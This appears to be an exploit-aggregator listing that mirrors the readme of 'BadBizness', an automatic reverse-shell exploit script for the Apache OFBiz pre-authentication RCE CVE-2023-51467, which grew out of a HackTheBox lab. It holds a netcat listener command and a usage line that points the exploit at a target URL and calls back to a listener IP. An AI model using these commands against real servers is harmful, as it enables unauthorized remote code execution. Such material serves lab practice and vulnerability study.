CVE-2023-51467 PoC — Apache OFBiz: Pre-authentication Remote Code Execution (RCE) vulnerability

Source

https://github.com/Jake123otte1/BadBizness

Associated Vulnerability

Title:Apache OFBiz: Pre-authentication Remote Code Execution (RCE) vulnerability (CVE-2023-51467)
Description:The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code

Description

Auto exploit script for the Java web framework OF Biz under CVE-2023-51467.

Readme

![banner](badbiz.png)

# BadBizness
Automatic exploitation script for the Java web framework [OF Biz](https://ofbiz.apache.org/) under CVE-2023-51467. Inspired by the HackTheBox machine [Bizness](https://app.hackthebox.com/machines/582).

## Usage and Example
This script requires the tool [ysoserial](https://github.com/frohoff/ysoserial/releases) and OpenJDK version 11. See usage menu for installation.

Setup a listener to catch the shell with your preferred method. Here is a netcat example:
```
nc -nlvp 1337
```
Execute the script:
```
python3 badbizness.py [path to ysoserial-all.jar] [TARGET BASE URL] [LISTENER IP] [LISTENER PORT]

python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
```
## Disclaimer and Credit
This tool was meant as a way to learn more about Python. I credit [this](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC) script for helping me thoroughly.

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!